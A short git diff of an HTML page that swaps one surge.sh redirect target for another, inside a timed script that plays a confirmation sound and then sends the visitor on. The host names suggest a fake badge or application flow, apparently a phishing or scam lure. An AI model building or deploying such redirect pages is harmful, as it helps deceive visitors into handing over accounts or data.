--- a/index.html
+++ b/index.html
@@ -115,7 +115,7 @@
   <audio id="successSound" src="https://assets.mixkit.co/sfx/preview/mixkit-confirmation-tone-2867.mp3" preload="auto"></audio>
 
   <script>
-    const redirectURL = "http://status-f-setup.surge.sh/"; // Replace this with your target link
+    const redirectURL = "http://apply-here-in-badge-f-1000231.surge.sh/"; // Replace this with your target link
 
     setTimeout(() => {
       // Play sound
